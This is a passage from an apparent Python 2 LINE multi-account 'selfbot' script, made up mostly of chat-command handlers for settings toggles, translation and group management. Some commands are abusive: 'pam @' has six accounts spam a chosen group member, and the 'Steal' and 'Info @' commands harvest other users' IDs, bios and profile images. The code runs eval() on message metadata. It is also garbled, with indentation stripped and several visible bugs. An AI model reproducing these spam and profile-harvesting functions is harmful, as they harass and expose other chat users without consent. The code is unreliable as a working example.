h = cl.getContact(mid)
cl.sendVideoWithURL(msg.to,"http://dl.profile.line-cdn.net/" + h.pictureStatus)
elif msg.text in ["Urlpict"]:
h = cl.getContact(mid)
cl.sendText(msg.to,"http://dl.profile.line-cdn.net/" + h.pictureStatus)
elif msg.text in ["Mycover"]:
h = cl.getContact(mid)
cu = cl.channel.getCover(mid)
path = str(cu)
cl.sendImageWithURL(msg.to, path)
elif msg.text in ["Urlcover"]:
h = cl.getContact(mid)
cu = cl.channel.getCover(mid)
path = str(cu)
cl.sendText(msg.to, path)
#=======================================================
elif "Translate-arab " in msg.text:
if msg.from_ in admin:
txt = msg.text.replace("Translate-arab ","")
try:
translator = Translator()
trs = translator.translate(txt,'ar')
A = trs.text
A = A.encode('utf-8')
cl.sendText(msg.to,A)
except:
cl.sendText(msg.to,'Error.')
elif "Translate-korea " in msg.text:
if msg.from_ in admin:
txt = msg.text.replace("Translate-korea ","")
try:
translator = Translator()
trs = translator.translate(txt,'ko')
A = trs.text
A = A.encode('utf-8')
cl.sendText(msg.to,A)
except:
cl.sendText(msg.to,'Error.')
elif "Translate-chin " in msg.text:
if msg.from_ in admin:
txt = msg.text.replace("Translate-chin ","")
try:
translator = Translator()
trs = translator.translate(txt,'zh-cn')
A = trs.text
A = A.encode('utf-8')
cl.sendText(msg.to,A)
except:
cl.sendText(msg.to,'Error.')
elif "Translate-japan " in msg.text:
if msg.from_ in admin:
txt = msg.text.replace("Translate-japan ","")
try:
translator = Translator()
trs = translator.translate(txt,'ja')
A = trs.text
A = A.encode('utf-8')
cl.sendText(msg.to,A)
except:
cl.sendText(msg.to,'Error.')
elif "Translate-thai " in msg.text:
if msg.from_ in admin:
txt = msg.text.replace("Translate-thai ","")
try:
translator = Translator()
trs = translator.translate(txt,'th')
A = trs.text
A = A.encode('utf-8')
cl.sendText(msg.to,A)
except:
cl.sendText(msg.to,'Error.')
elif "Translate-idn " in msg.text:
if msg.from_ in admin:
txt = msg.text.replace("Translate-idn ","")
try:
translator = Translator()
trs = translator.translate(txt,'id')
A = trs.text
A = A.encode('utf-8')
cl.sendText(msg.to,A)
except:
cl.sendText(msg.to,'Error.')
elif "Translate-eng " in msg.text:
if msg.from_ in admin:
txt = msg.text.replace("Translate-eng ","")
try:
translator = Translator()
trs = translator.translate(txt,'en')
A = trs.text
A = A.encode('utf-8')
cl.sendText(msg.to,A)
except:
cl.sendText(msg.to,'Error.')
elif "Say " in msg.text:
if msg.from_ in admin:
bctxt = msg.text.replace("Say ","")
cl.sendText(msg.to,(bctxt))
kk.sendText(msg.to,(bctxt))
kc.sendText(msg.to,(bctxt))
ki.sendText(msg.to,(bctxt))
ks.sendText(msg.to,(bctxt))
kt.sendText(msg.to,(bctxt))
#======================================
elif "TL:" in msg.text:
if msg.from_ in admin:
tl_text = msg.text.replace("TL:","")
cl.sendText(msg.to,"line://home/post?userMid="+mid+"&postId="+cl.new_post(tl_text)["result"]["post"]["postInfo"]["postId"])
#=================================================================
elif msg.text in ["Protect:hight","protect:hight"]:
if msg.from_ in admin:
if wait["protectionOn"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"turned into high protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"turned into high protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["protectionOn"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"turned into high protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"turned into high protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
elif msg.text in ["Auto blockqr:off","auto blockqr:off"]:
if msg.from_ in admin:
if wait["qr"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already off\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"Protection QR PRO Off\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["qr"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protection QR PRO Off\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"Already off\n\n"+ datetime.today().strftime('%H:%M:%S'))
#≠≠================≠==================≠====≠===========!=======!==!
elif msg.text in ["Auto reinvite:off","auto reinvite:off"]:
if msg.from_ in admin:
if wait["autorein"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to, "Already off\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"Already off\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["autorein"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to, "Already off\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"Already off\n\n"+ datetime.today().strftime('%H:%M:%S'))
elif msg.text in ["Auto reinvite:on","auto reinvite:on"]:
if msg.from_ in admin:
if wait["autorein"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to, "Already on\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to ,"Already on\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["autorein"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to, "Already on\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"Already on\n"+ datetime.today().strftime('%H:%M:%S'))
##≠========================&=&==&=&=%=%=%=%==%=%=%=%;%;%;;%;;%;%
elif msg.text in ["Welcome message:on"]:
if msg.from_ in admin:
if wait["welcomemsg"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"welcome message on\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"welcome message on\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["welcomemsg"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"welcome message on\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"welcome message on")
elif msg.text in ["Auto blockqr:on","auto blockqr:on"]:
if msg.from_ in admin:
if wait["qr"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already on\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"Protection QR PRO On\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["qr"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protection QR PRO On\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"Already on")
elif msg.text in ["Welcome message:off"]:
if msg.from_ in admin:
if wait["welcomemsg"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"welcome message off\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"welcome message off\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["welcomemsg"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"welcome message off\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"welcome message off\n\n"+ datetime.today().strftime('%H:%M:%S'))
elif msg.text in ["Protect:low","Protect:low"]:
if msg.from_ in admin:
if wait["protectionOn"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"turned into low protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"turned into low protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["protectionOn"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"turned into low protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"turned into low protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
elif "Namelock:on" in msg.text:
if msg.from_ in admin:
if msg.to in wait['pname']:
cl.sendText(msg.to,"ƬƲƦƝЄƊ ƠƝ.")
else:
cl.sendText(msg.to,"ƛԼƦЄƛƊƳ ƠƝ")
wait['pname'][msg.to] = True
wait['pro_name'][msg.to] = cl.getGroup(msg.to).name
elif "Namelock:off" in msg.text:
if msg.from_ in admin:
if msg.to in wait['pname']:
cl.sendText(msg.to,"ƬƲƦƝ ƠƑƑ.")
del wait['pname'][msg.to]
else:
cl.sendText(msg.to,"ƛԼƦЄƛƊƳ ƠƑƑ")
elif "Blockinvite:on" == msg.text:
if msg.from_ in admin:
gid = msg.to
autocancel[gid] = "poni"
cl.sendText(msg.to,"ƤƦƠƬЄƇƬ ƖƝƔƖƬƛƬƖƠƝ ƠƝ")
elif "Blockinvite:off" == msg.text:
if msg.from_ in admin:
try:
del autocancel[msg.to]
cl.sendText(msg.to,"ƤƦƠƬЄƇƬ ƖƝƔƖƬƛƬƖƠƝ ƠƑƑ")
except:
pass
#================================================================
elif msg.text in ["Shows offenders:on"]:
if msg.from_ in admin:
if wait["pelaku"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already activated")
else:
cl.sendText(msg.to,"enable ")
else:
wait["pelaku"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"already activated")
else:
cl.sendText(msg.to,"enable ")
elif msg.text in ["Shows offenders:off"]:
if msg.from_ in admin:
if wait["pelaku"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already unactivated")
else:
cl.sendText(msg.to,"disable ")
else:
wait["pelaku"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"already unactivated")
else:
cl.sendText(msg.to,"disable")
elif msg.text in ["Invite user"]:
if msg.from_ in admin:
wait["winvite"] = True
cl.sendText(msg.to,"send contact")
#============================================================
elif "Steal mid" in msg.text:
if msg.from_ in admin:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
cl.sendText(msg.to,"Mc: " + key1)
elif "Steal contact" in msg.text:
if msg.from_ in admin:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
mmid = cl.getContact(key1)
msg.contentType = 13
msg.contentMetadata = {"mid": key1}
cl.sendMessage(msg)
elif "Mc:" in msg.text:
if msg.from_ in admin:
mmid = msg.text.replace("Mc:","")
msg.contentType = 13
msg.contentMetadata = {"mid":mmid}
cl.sendMessage(msg)
#==========≠===============================
elif msg.text in ["Tag on"]:
if wait["tag"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already set to on")
else:
cl.sendText(msg.to,"Tag On")
else:
wait["tag"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Tag On")
else:
cl.sendText(msg.to,"already set to on")
elif msg.text in ["Tag off"]:
if wait["tag"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already set to off")
else:
cl.sendText(msg.to,"Tag Off")
else:
wait["tag"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Tag Off")
else:
cl.sendText(msg.to,"Already set to off")
#=======================================================
elif msg.text in ["Auto notice:on"]:
if msg.from_ in admin:
if wait["contact"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already activated")
else:
cl.sendText(msg.to,"enable notifications")
else:
wait["contact"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"already activated")
else:
cl.sendText(msg.to,"enable notifications")
#=========================================================================
elif msg.text in ["Auto notice:off"]:
if msg.from_ in admin:
if wait["contact"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already unactivated")
else:
cl.sendText(msg.to,"disable notifications")
else:
wait["contact"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"already unactivated")
else:
cl.sendText(msg.to,"disable notifications")
elif msg.text in ["Auto join:on"]:
if msg.from_ in admin:
if wait["autoJoin"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"")
else:
cl.sendText(msg.to,"already activated")
else:
wait["autoJoin"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"enable auto koin")
else:
cl.sendText(msg.to,"")
elif msg.text in ["Auto join:off"]:
if msg.from_ in admin:
if wait["autoJoin"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already unactivated")
else:
cl.sendText(msg.to,"desable auto join")
else:
wait["autoJoin"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"already unactivated")
else:
cl.sendText(msg.to,"desable auto join")
elif "Gcancel:" in msg.text:
if msg.from_ in admin:
try:
strnum = msg.text.replace("Gcancel:","")
if strnum == "off":
wait["autoCancel"]["on"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Invitation refused turned off\nTo turn on please specify the number of people and send")
else:
cl.sendText(msg.to,"关了邀请拒绝。要时开请指定人数发送")
else:
num = int(strnum)
wait["autoCancel"]["on"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,strnum + " The group of people and below decided to automatically refuse invitation")
else:
cl.sendText(msg.to,strnum + "使人以下的小组用自动邀请拒绝")
except:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Value is wrong")
else:
cl.sendText(msg.to,"Bizarre ratings")
elif msg.text in ["Auto leave:on"]:
if msg.from_ in admin:
if wait["leaveRoom"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already on")
else:
cl.sendText(msg.to,"done")
else:
wait["leaveRoom"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"要了开。")
elif msg.text in ["Auto leave:off"]:
if msg.from_ in admin:
if wait["leaveRoom"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already off")
else:
cl.sendText(msg.to,"done")
else:
wait["leaveRoom"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"already")
#===============================================================
elif msg.text in ["Auto like:on"]:
if msg.from_ in admin:
if wait["likeOn"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Done。")
else:
wait["likeOn"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already。")
elif msg.text in ["Auto like:off"]:
if msg.from_ in admin:
if wait["likeOn"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Done。")
else:
wait["likeOn"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already。")
#==========================================================
elif msg.text in ["Set"]:
if msg.from_ in admin:
print "Setting pick up..."
md="list of bot settings\n\n"
if wait["likeOn"] == True: md+="Auto like : on\n"
else:md+="Auto like : off\n"
if mimic["copy"] == True: md+="Mimic : on\n"
else:md+="Mimic : off\n"
if wait["winvite"] == True: md+="Invite : on\n"
else:md+="Invite : off\n"
if wait["pname"] == True: md+="Namelock : on\n"
else:md+="Namelock : off\n"
if wait["contact"] == True: md+="Notice : on\n"
else: md+="Notice : off\n"
if wait["autoJoin"] == True: md+="Auto join : on\n"
else: md +="Auto join : off\n"
if wait["autoCancel"]["on"] == True:md+="Group cancel :" + str(wait["autoCancel"]["members"]) + "\n"
else: md+= "Group cancel : off\n"
if wait["leaveRoom"] == True: md+="Auto leave : on\n"
else: md+="Auto leave : off\n"
if wait["clock"] == True: md+="Clock Name : on\n"
else:md+="Clock Name : off\n"
if wait["autoAdd"] == True: md+="Auto add : on\n"
else:md+="Auto add : off\n"
if wait["commentOn"] == True: md+="Comment : on\n"
else:md+="Comment : off\n"
if wait["Backup"] == True: md+="Backup : on\n"
else:md+="Backup : off\n"
if wait["qr"] == True: md+="Protect QR : on\n"
else:md+="Protect QR : off\n"
if wait["welcomemsg"] == True: md+="welcome message : on\n"
else:md+="welcome message : off\n"
if wait["protectionOn"] == True: md+="Protection : hight\n\n"+ datetime.today().strftime('%H:%M:%S')
else:md+="Protection : low\n\n"+ datetime.today().strftime('%H:%M:%S')
if wait["autorein"] == True: md+="auto reinvite : on\n"
else:md+="auto reinvite : off\n"
if wait["pelaku"] == True: md+="shows offender : on\n"
else:md+="shows offender : off\n"
if wait["tag"] == True: md+"Notag : on\n"
else:md+="Notag : off\n"
cl.sendText(msg.to,md)
#========================================
#------------------------------------------------
elif "Time" in msg.text:
if msg.from_ in admin:
cl.sendText(msg.to,datetime.today().strftime('%H:%M:%S'))
elif msg.text in ["PING","Ping","ping"]:
if msg.from_ in admin:
ki.sendText(msg.to,"PONG double thumbs upHar Har")
kk.sendText(msg.to,"PONG double thumbs upHar Har")
kc.sendText(msg.to,"PONG double thumbs upHar Har")
ks.sendText(msg.to,"PONG double thumbs upHar Har")
kt.sendText(msg.to,"PONG double thumbs upHar Har")
cl.sendText(msg.to,"PONG double thumbs upHar Har")
elif "Info @" in msg.text:
if msg.from_ in admin:
nama = msg.text.replace("Info @","")
target = nama.rstrip(' ')
tob = cl.getGroup(msg.to)
for g in tob.members:
if target == g.displayName:
gjh= cl.getContact(g.mid)
try:
cover = cl.channel.getCover(g.mid)
except:
cover = ""
cl.sendText(msg.to,"[Display Name]:\n" + gjh.displayName + "\n[Mid]:\n" + gjh.mid + "\n[BIO]:\n" + gjh.statusMessage + "\n[pict profile]:\nhttp://dl.profile.line-cdn.net/" + gjh.pictureStatus + "\n[Cover]:\n" + str(cover))
else:
pass
#-----------------------------------------------
elif msg.text in ["Backup:on"]:
if msg.from_ in admin:
if wait["Backup"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"backup has been active\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"backup has been enable\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["Backup"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"backup has been active\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"backup has been enable\n\n"+ datetime.today().strftime('%H:%M:%S'))
elif msg.text in ["Backup:off"]:
if msg.from_ in admin:
if wait["Backup"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"backup has been unactive\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"backup has been desable\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["Backup"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"backup has been unactive\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"backup has been desable\n\n"+ datetime.today().strftime('%H:%M:%S'))
elif msg.text in ["Rejectall"]:
if msg.from_ in admin:
gid = cl.getGroupIdsInvited()
for i in gid:
cl.rejectGroupInvitation(i)
if wait["lang"] == "JP":
cl.sendText(msg.to,"All Invites has been Rejected")
else:
cl.sendText(msg.to,"拒绝了全部的邀请。")
elif msg.text in ["Auto add:on"]:
if msg.from_ in admin:
if wait["autoAdd"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"success activated")
else:
cl.sendText(msg.to,"success activated")
else:
wait["autoAdd"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"success activated")
else:
cl.sendText(msg.to,"success activated")
elif msg.text in ["Auto add:off"]:
if msg.from_ in admin:
if wait["autoAdd"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"success unactivated")
else:
cl.sendText(msg.to,"success unactivated")
else:
wait["autoAdd"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"success unactivated")
else:
cl.sendText(msg.to,"success unactivated")
#========================================
elif "pam @" in msg.text:
_name = msg.text.replace("pam @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
for g in gs.members:
if _nametarget == g.displayName:
cl.sendText(g.mid,"Spammed")
ki.sendText(g.mid,"Spammed")
kc.sendText(g.mid,"Spammed")
ks.sendText(g.mid,"Spammed")
kk.sendText(g.mid,"Spammed")
kt.sendText(g.mid,"Spammed")
ct.sendText(msg.to,"done spam bossque")
#========================================
elif "Update welcome:" in msg.text:
if msg.from_ in admin:
wait["welmsg"] = msg.text.replace("Update welcome:","")
cl.sendText(msg.to,"update welcome message succes"+ datetime.today().strftime('%H:%M:%S'))
elif msg.text in ["Check welcome message"]:
if msg.from_ in admin:
if wait["lang"] == "JP":
cl.sendText(msg.to,"yor bot message\n\n" + wait["welmsg"])
else:
cl.sendText(msg.to,"The automatic appending information is set as follows。\n\n" + wait["welmsg"])
elif "Message:" in msg.text:
if msg.from_ in admin:
wait["message"] = msg.text.replace("Message:","")
cl.sendText(msg.to,"bot message\n\n"+ datetime.today().strftime('%H:%M:%S'))
elif "Add message:" in msg.text:
if msg.from_ in admin:
wait["message"] = msg.text.replace("Add message:","")
if wait["lang"] == "JP":
cl.sendText(msg.to,"message changed\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"done。\n\n"+ datetime.today().strftime('%H:%M:%S'))
elif msg.text in ["Check message"]:
if msg.from_ in admin:
if wait["lang"] == "JP":
cl.sendText(msg.to,"yor bot message\n\n" + wait["message"])
else:
cl.sendText(msg.to,"The automatic appending information is set as follows。\n\n" + wait["message"])
elif "Comment:" in msg.text:
if msg.from_ in admin:
c = msg.text.replace("Comment:","")
if c in [""," ","\n",None]:
cl.sendText(msg.to,"String that can not be changed")
else:
wait["comment"] = c
cl.sendText(msg.to,"changed\n\n" + c)
elif "Add comment:" in msg.text:
if msg.from_ in admin:
c = msg.text.replace("Add comment:","")
if c in [""," ","\n",None]:
cl.sendText(msg.to,"String that can not be changed")
else:
wait["comment"] = c
cl.sendText(msg.to,"changed\n\n" + c)
elif msg.text in ["Comment:on"]:
if msg.from_ in admin:
if wait["commentOn"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Done")
else:
cl.sendText(msg.to,"Already on")
else:
wait["commentOn"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Done")
else:
cl.sendText(msg.to,"Already on")
elif msg.text in ["Comment:off"]:
if msg.from_ in admin:
if wait["commentOn"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Done")
else:
cl.sendText(msg.to,"Already off")
else:
wait["commentOn"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Done")
else:
cl.sendText(msg.to,"Already off")
elif msg.text in ["Check comment"]:
if msg.from_ in admin:
cl.sendText(msg.to,"message comment\n\n" + str(wait["comment"]))
elif msg.text in ["Gurl"]:
if msg.from_ in admin:
if msg.toType == 2:
uye = random.choice(KAC)
x = cl.getGroup(msg.to)
if x.preventJoinByTicket == True:
x.preventJoinByTicket = False
uye.updateGroup(x)
gurl = uye.reissueGroupTicket(msg.to)
uye.sendText(msg.to,"line://ti/g/" + gurl)
else:
if wait["lang"] == "JP":
uye.sendText(msg.to,"Can not be used outside the group")
else:
uye.sendText(msg.to,"Not for use less than group")
#===========================================
elif msg.text.lower() == 'Responsename':
if msg.from_ in admin:
profile = cl.getProfile()
text = profile.displayName + ""
cl.sendText(msg.to, text)
profile = ki.getProfile()
text = profile.displayName + ""
ki.sendText(msg.to, text)
profile = kk.getProfile()
text = profile.displayName + ""
kk.sendText(msg.to, text)
profile = kc.getProfile()
text = profile.displayName + ""
kc.sendText(msg.to, text)
profile = ks.getProfile()
text = profile.displayName + ""
ks.sendText(msg.to, text)
profile = kt.getProfile()
text = profile.displayName + ""
kt.sendText(msg.to, text)
elif msg.text in ["Respon"]:
print "EXCUTED -- ABSEN BOT"
cl.sendText(msg.to,"✴✴(iɥpɐƃuɐqɐq)")
ki.sendText(msg.to,"✴✴(iɥpɐƃuɐqɐq)")
kk.sendText(msg.to,"✴✴(iɥpɐƃuɐqɐq)")
kc.sendText(msg.to,"✴✴(iɥpɐƃuɐqɐq)")
ks.sendText(msg.to,"✴✴(iɥpɐƃuɐqɐq)")
kt.sendText(msg.to,"😗😗😗😗😗😗")
#========================================
elif msg.text in ["Comment bl "]:
wait["wblack"] = True
cl.sendText(msg.to,"add to comment bl")
elif msg.text in ["Comment wl "]:
wait["dblack"] = True
cl.sendText(msg.to,"wl to comment bl")
elif msg.text in ["Comment bl confirm"]:
if wait["commentBlack"] == {}:
cl.sendText(msg.to,"confirmed")
else:
cl.sendText(msg.to,"Blacklist s")
mc = ""
for mi_d in wait["commentBlack"]:
mc += "・" +cl.getContact(mi_d).displayName + "\n"
cl.sendText(msg.to,mc)
elif msg.text in ["Clock:on","Clock on","Jam on","Jam:on"]:
if wait["clock"] == True:
cl.sendText(msg.to,"already on")
else:
wait["clock"] = True
now2 = datetime.now()
nowT = datetime.strftime(now2,"[%H:%M]")
profile = cl.getProfile()
profile.displayName = wait["cName"] + nowT
cl.updateProfile(profile)
cl.sendText(msg.to,"done")
elif msg.text in ["Clock:off","Clock off","Jam off","Jam:off"]:
if wait["clock"] == False:
cl.sendText(msg.to,"already off")
else:
wait["clock"] = False
cl.sendText(msg.to,"done")
elif "Cc: " in msg.text:
n = msg.text.replace("Cc: ","")
if len(n.decode("utf-8")) > 13:
cl.sendText(msg.to,"changed")
else:
wait["cName"] = n
cl.sendText(msg.to,"Changed to:\n\n" + n)
elif msg.text in ["Up"]:
if wait["clock"] == True:
now2 = datetime.now()
nowT = datetime.strftime(now2,"[%H:%M]")
profile = cl.getProfile()
profile.displayName = wait["cName"] + nowT
cl.updateProfile(profile)
cl.sendText(msg.to,"Refresh to update")
else:
cl.sendText(msg.to,"Please turn on the name clock")
#========================================
elif "Steal cover @" in msg.text:
if msg.from_ in admin:
print "[Command]dp executing"
_name = msg.text.replace("Steal cover @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
contact = cl.getContact(target)
cu = cl.channel.getCover(target)
path = str(cu)
cl.sendImageWithURL(msg.to, path)
except:
pass
print "[Command]dp executed"
elif "Midpict:" in msg.text:
if msg.from_ in admin:
umid = msg.text.replace("Midpict:","")
contact = cl.getContact(umid)
try:
image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
except:
image = "https://www.1and1.co.uk/digitalguide/fileadmin/DigitalGuide/Teaser/not-found-t.jpg"
try:
cl.sendImageWithURL(msg.to,image)
except Exception as error:
cl.sendText(msg.to,(error))
pass
elif "Steal pict " in msg.text:
if msg.from_ in admin:
if msg.toType == 2:
msg.contentType = 0
steal0 = msg.text.replace("Steal pict ","")
steal1 = steal0.lstrip()
steal2 = steal1.replace("@","")
steal3 = steal2.rstrip()
_name = steal3
group = cl.getGroup(msg.to)
targets = []
for g in group.members:
if _name == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"not found")
else:
for target in targets:
try:
contact = cl.getContact(target)
try:
image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
except:
image = "https://www.1and1.co.uk/digitalguide/fileadmin/DigitalGuide/Teaser/not-found-t.jpg"
try:
cl.sendImageWithURL(msg.to,image)
except Exception as error:
cl.sendText(msg.to,(error))
pass
except:
cl.sendText(msg.to,"Error!")
break
else:
cl.sendText(msg.to,"Tidak bisa dilakukan di luar grup")
elif "Pict group " in msg.text:
saya = msg.text.replace('Pict group ','')
gid = cl.getGroupIdsJoined()
for i in gid:
h = cl.getGroup(i).name
gna = cl.getGroup(i)
if h == saya:
cl.sendImageWithURL(msg.to,"http://dl.profile.line.naver.jp/"+ gna.pictureStatus)
elif msg.text in ["My name"]:
h = cl.getContact(mid)
cl.sendText(msg.to,"===[DisplayName]===\n" + h.displayName)
elif msg.text in ["My bio"]:
h = cl.getContact(mid)
cl.sendText(msg.to,"===[StatusMessage]===\n" + h.statusMessage)
elif msg.text in ["My pict"]:
h = cl.getContact(mid)
cl.sendImageWithUrl(msg.to,"http://dl.profile.line-cdn.net/" + h.pictureStatus)
elif msg.text in ["My cover"]:
h = cl.getContact(mid)
cu = cl.channel.getCover(mid)
path = str(cu)
cl.sendImageWithUrl(msg.to, path)
elif "Pap set:" in msg.text:
wait["Pap"] = msg.text.replace("Pap set:","")
cl.sendText(msg.to,"Pap Has Ben Set To")
elif msg.text in [".Pap","Pap"]:
cl.sendImageWithURL(msg.to,wait["Pap"])
#==≠============================================
elif "Vn" in msg.text:
say = msg.text.replace("Vn","")
lang = 'id'
tts = gTTS(text=say, lang=lang)
tts.save("hasil.mp3")
cl.sendAudio(msg.to,"hasil.mp3")
elif msg.text in ["Kalender","/waktu"]:
timeNow = datetime.now()
timeHours = datetime.strftime(timeNow,"(%H:%M)")
day = ["Sunday", "Monday", "Tuesday", "Wednesday", "Thursday","Friday", "Saturday"]
hari = ["Minggu", "Senin", "Selasa", "Rabu", "Kamis", "Jumat", "Sabtu"]
bulan = ["Januari", "Februari", "Maret", "April", "Mei", "Juni", "Juli", "Agustus", "September", "Oktober", "November", "Desember"]
inihari = datetime.today()
hr = inihari.strftime('%A')
bln = inihari.strftime('%m')
for i in range(len(day)):
if hr == day[i]: hasil = hari[i]
for k in range(0, len(bulan)):
if bln == str(k): blan = bulan[k-1]
rst = hasil + ", " + inihari.strftime('%d') + " - " + blan + " - " + inihari.strftime('%Y') + "\nJam : [ " + inihari.strftime('%H:%M:%S') + " ]"
cl.sendText(msg.to, rst)
elif "Creat group" in msg.text:
thisgroup = cl.getGroups([msg.to])
Mids = [contact.mid for contact in thisgroup[0].members]
mi_d = Mids[:33]
cl.createGroup("New", mi_d)
cl.sendText(msg.to,"Succes creat new group")
elif msg.text in ["Like:friend", "Bot like temen"]:
print "[Command]Like executed"
cl.sendText(msg.to,"pertamax")
try:
likefriend()
except:
pass
elif "Cek zodiak " in msg.text:
tanggal = msg.text.replace("Cek zodiak ","")
r=requests.get('https://script.google.com/ macros/exec?service=AKfycbw7gKzP-WYV 2F5mc9RaR7yE3Ve1yN91Tjs91hp_jHSE02dSv9w&nama=ervan&tanggal='+tanggal)
data=r.text
data=json.loads(data)
lahir = data["data"]["lahir"]
usia = data["data"]["usia"]
ultah = data["data"]["ultah"]
zodiak = data["data"]["zodiak"]
cl.sendText(msg.to,"Tanggal Lahir: "+lahir+"\n\nUsia:"+usia+"\n\nUltah: "+ultah+"\n\nZodiak: "+zodiak)
elif "Steal " in msg.text:
if msg.from_ in admin:
salsa = msg.text.replace("Steal ","")
Manis = cl.getContact(salsa)
Imoet = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
try:
cover = cl.channel.getCover(Manis)
except:
cover = ""
